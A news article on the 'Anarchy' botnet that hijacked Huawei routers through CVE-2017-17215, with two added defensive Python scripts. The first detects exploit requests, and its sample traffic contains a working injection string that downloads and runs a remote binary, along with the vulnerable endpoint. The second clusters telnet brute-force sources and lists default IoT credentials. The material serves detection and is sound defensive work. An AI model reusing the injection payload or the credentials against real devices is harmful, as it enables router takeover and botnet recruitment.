IoT hacker builds Huawei-based botnet, enslaves 18,000 devices in one day

A hacker has taken only 24 hours to build a botnet that is at least 18,000 devices strong.
Written by Charlie Osborne, Contributing Writer

How long does it take to build a botnet? Not long, if you consider Anarchy's 18,000-device-strong creation, brought to life in only 24 hours.

Researchers from NewSky Security spotted the botnet first, as reported by Bleeping Computer, and other security firms including Rapid7 and Qihoo 360 Netlab quickly confirmed the existence of the new threat.

The security teams had noticed a sharp recent increase in scanning for Huawei devices.

The traffic surge came from scans seeking devices vulnerable to CVE-2017-17215, a critical flaw in the UPnP service that Huawei HG532 routers expose on TCP port 37215.

Scans to find routers vulnerable to the issue began on 18 July.

An attacker who can reach that port on a vulnerable Huawei router can send crafted packets to the device and execute code on it remotely, which is enough to take control of the router and add it to a botnet.
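The scanning described above leaves a recognisable trace on the wire: a POST to the UPnP upgrade endpoint on port 37215 whose URL arguments contain shell command substitution instead of a plain URL. The detector below is an added example written for this page, not code from the article or from any of the research teams it cites. The endpoint path `/ctrlt/DeviceUpgrade_1`, the `NewStatusURL`/`NewDownloadURL` argument names and the SOAP action string are assumptions about the public exploit payload (the article only gives the CVE and the port), and the sample requests are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Port of the vulnerable Huawei UPnP service, as given in the article.
HUAWEI_UPNP_PORT = 37215
# Endpoint and SOAP argument names abused by the public exploit. These are
# assumptions drawn from the released exploit code, not stated in the article.
UPGRADE_PATH = "/ctrlt/DeviceUpgrade_1"
INJECTABLE_FIELDS = ("NewStatusURL", "NewDownloadURL")
# Shell command substitution ($(...) or backticks) inside an argument value is
# the tell: a real upgrade request carries only a URL there.
CMD_SUBST = re.compile(r"\$\((?P<cmd>[^)]*)\)|`(?P<bt>[^`]*)`")
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s'\"<>;`]+")


@dataclass
class Finding:
    src: str
    dst: str
    soap_action: str
    commands: List[str] = field(default_factory=list)  # injected shell commands
    urls: List[str] = field(default_factory=list)      # payload download URLs (IOCs)


def parse_http_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_request(src: str, dst: str, dport: int, raw: str) -> Optional[Finding]:
    """Return a Finding if the request looks like a CVE-2017-17215 exploit attempt."""
    if dport != HUAWEI_UPNP_PORT:
        return None
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or path != UPGRADE_PATH:
        return None
    finding = Finding(src, dst, headers.get("soapaction", ""))
    for name in INJECTABLE_FIELDS:
        for m in re.finditer(rf"<{name}>(.*?)</{name}>", body, re.S):
            value = m.group(1)
            for cm in CMD_SUBST.finditer(value):
                cmd = cm.group("cmd") if cm.group("cmd") is not None else cm.group("bt")
                finding.commands.append(cmd.strip())
            finding.urls.extend(URL_RE.findall(value))
    # Plain URLs in the upgrade fields are what a legitimate request contains;
    # only injected command substitution is reported.
    return finding if finding.commands else None


def scan(records) -> List[Finding]:
    """Run inspect_request over (src, dst, dport, raw_request) tuples."""
    return [f for f in (inspect_request(*r) for r in records) if f]


def _soap_upgrade(status_url: str, download_url: str) -> str:
    """Build a raw HTTP request to the upgrade endpoint (constructed sample)."""
    body = (
        '<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
        '<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
        f"<NewStatusURL>{status_url}</NewStatusURL>"
        f"<NewDownloadURL>{download_url}</NewDownloadURL>"
        "</u:Upgrade></s:Body></s:Envelope>"
    )
    return (
        f"POST {UPGRADE_PATH} HTTP/1.1\r\nHost: 192.0.2.10:{HUAWEI_UPNP_PORT}\r\n"
        "Content-Type: text/xml\r\n"
        'SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#Upgrade"\r\n'
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    )


# Constructed sample traffic: one exploit attempt, one benign upgrade call, one unrelated POST.
SAMPLE_RECORDS = [
    ("198.51.100.7", "192.0.2.10", HUAWEI_UPNP_PORT, _soap_upgrade(
        "$(/bin/busybox wget http://203.0.113.10/bins/arm7 -O /tmp/.x; chmod +x /tmp/.x; /tmp/.x)",
        "HUAWEIUPNP")),
    ("192.0.2.2", "192.0.2.10", HUAWEI_UPNP_PORT, _soap_upgrade(
        "http://192.0.2.2/status", "http://192.0.2.2/firmware.bin")),
    ("198.51.100.7", "192.0.2.10", 80, "POST /login HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\nuser=a"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"{f.src} -> {f.dst}: {f.commands} urls={f.urls}")
```

Only the first record is reported; the benign upgrade call to the same endpoint carries plain URLs and is left alone, so the rule keys on the injection rather than on the endpoint. The extracted download URL is the useful artefact for a SOC: it is the distribution host for the bot binary, and blocking or sinkholing it stops the infection step even on routers that cannot be patched immediately.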

A botnet is a large network of compromised devices, which can include standard PCs, routers, smartphones and, more recently, Internet of Things (IoT) devices ranging from smart lights to fridges.

The LizardStresser botnet, a distributed denial-of-service (DDoS)-for-hire system, for example, was able to launch 400Gbps attacks thanks to vulnerable IoT devices.

After its source code was released to the public in 2015, LizardStresser variants were discovered that targeted IoT products by brute-forcing telnet logins on random IP addresses with a hard-coded list of user credentials.

Hard-coded credentials remain a common problem with IoT products even today, and a simple scanner is often all it takes to compromise such devices.
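Because such scanners carry their credential list in the binary, every infected bot tries the same username/password pairs in the same order, which is something a defender can use. The script below is an added example for this page, not code from the article or from any LizardStresser or Mirai analysis: it profiles telnet login attempts per source, flags sources that run a fixed dictionary against several hosts, and clusters sources by the exact ordered list they used, which groups bots of the same family together. The log format, the source and target addresses and the credential pairs are all constructed for the example; the pairs are illustrative defaults, not a list taken from the page.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# Constructed telnet honeypot log format (not from the article):
# <timestamp> <src> -> <dst>:23 login <user>/<password> OK|FAIL
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):23 login "
    r"(?P<user>[^/ ]+)/(?P<pw>\S*) (?P<result>OK|FAIL)$"
)

Cred = Tuple[str, str]


@dataclass
class Attempt:
    ts: str
    src: str
    dst: str
    cred: Cred
    ok: bool


def parse(lines: Iterable[str]) -> List[Attempt]:
    """Parse log lines, silently skipping anything that does not match the format."""
    out = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            out.append(Attempt(m["ts"], m["src"], m["dst"], (m["user"], m["pw"]), m["result"] == "OK"))
    return out


def profile_sources(lines: Iterable[str], min_targets: int = 3, min_creds: int = 3) -> Dict[str, dict]:
    """Flag sources that try a fixed credential dictionary against several hosts.

    A legitimate admin retries one box with a few typos; a scanner walks many
    hosts with the same list. Both thresholds are assumptions to tune locally.
    """
    per_src: Dict[str, dict] = defaultdict(lambda: {"targets": set(), "creds": [], "hits": []})
    for a in parse(lines):
        s = per_src[a.src]
        s["targets"].add(a.dst)
        if a.cred not in s["creds"]:       # keep first-seen order: it is the bot's fingerprint
            s["creds"].append(a.cred)
        if a.ok:
            s["hits"].append((a.dst, a.cred))
    report = {}
    for src, s in per_src.items():
        if len(s["targets"]) >= min_targets and len(s["creds"]) >= min_creds:
            report[src] = {
                "targets": len(s["targets"]),
                "dictionary": tuple(s["creds"]),
                "compromised": s["hits"],    # hosts that accepted a default credential
            }
    return report


def cluster_by_dictionary(report: Dict[str, dict]) -> Dict[Tuple[Cred, ...], List[str]]:
    """Group flagged sources that used exactly the same ordered credential list."""
    clusters: Dict[Tuple[Cred, ...], List[str]] = defaultdict(list)
    for src, info in report.items():
        clusters[info["dictionary"]].append(src)
    return dict(clusters)


# Constructed sample: two bots walking the same three-entry list, one real admin.
LOG = """\
2018-07-18T10:02:11Z 198.51.100.7 -> 192.0.2.5:23 login root/xc3511 FAIL
2018-07-18T10:02:12Z 198.51.100.7 -> 192.0.2.5:23 login root/vizxv FAIL
2018-07-18T10:02:13Z 198.51.100.7 -> 192.0.2.5:23 login admin/admin OK
2018-07-18T10:02:20Z 198.51.100.7 -> 192.0.2.6:23 login root/xc3511 FAIL
2018-07-18T10:02:21Z 198.51.100.7 -> 192.0.2.6:23 login root/vizxv FAIL
2018-07-18T10:02:22Z 198.51.100.7 -> 192.0.2.6:23 login admin/admin FAIL
2018-07-18T10:02:30Z 198.51.100.7 -> 192.0.2.7:23 login root/xc3511 FAIL
2018-07-18T10:03:01Z 203.0.113.44 -> 192.0.2.8:23 login root/xc3511 FAIL
2018-07-18T10:03:02Z 203.0.113.44 -> 192.0.2.8:23 login root/vizxv FAIL
2018-07-18T10:03:03Z 203.0.113.44 -> 192.0.2.8:23 login admin/admin FAIL
2018-07-18T10:03:10Z 203.0.113.44 -> 192.0.2.9:23 login root/xc3511 OK
2018-07-18T10:03:20Z 203.0.113.44 -> 192.0.2.10:23 login root/xc3511 FAIL
2018-07-18T10:03:21Z 203.0.113.44 -> 192.0.2.10:23 login root/vizxv FAIL
2018-07-18T10:05:00Z 192.0.2.100 -> 192.0.2.5:23 login admin/Summer2018 FAIL
2018-07-18T10:05:05Z 192.0.2.100 -> 192.0.2.5:23 login admin/Summer2018! OK
"""

if __name__ == "__main__":
    report = profile_sources(LOG.splitlines())
    for src, info in report.items():
        print(src, info["targets"], "hosts, compromised:", info["compromised"])
    for dictionary, sources in cluster_by_dictionary(report).items():
        print("same list", dictionary, "used by", sources)
```

The two scanner addresses are flagged and land in one cluster because their ordered credential lists are identical, while the admin who mistyped a password once is not. The `compromised` entries are the real output for an incident responder: they are the hosts on which a hard-coded credential actually worked and which therefore need the credential changed or the service closed.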


In the case of the new Huawei-based botnet, a hacker calling themselves "Anarchy" has claimed responsibility, according to NewSky Security's Ankit Anubhav.

The attacker claims to have used the old CVE-2017-17215 vulnerability to compromise at least 18,000 Huawei routers, and shared a list of victim IP addresses with the researcher; that list has not been made public.

Working exploit code for this known flaw was released to the public in January this year. It has since been used by the Satori and BrickerBot botnets, as well as by a string of variants of the infamous Mirai botnet, which is still going strong.


Mirai was used in 2016 to disrupt internet services across the US on a scale not seen before.

The motives have not been made clear, but the hacker told Anubhav that they wanted to make "the biggest, baddest botnet in town," which may suggest another LizardStresser scenario in future, with the botnet used in targeted attacks or even made available for hire.

"It's painfully hilarious how attackers can construct big bot armies with known vulns," the security researcher added.

Anubhav suspects that Anarchy may be the same hacker known as Wicked, who has been linked with the creation of the Owari/Sora botnets.

The story may not be over. Anarchy/Wicked told the researcher that they also intend to start scanning for CVE-2014-8361, a command-execution flaw in the UPnP SOAP service of the Realtek SDK used in many routers, in order to enslave more devices.
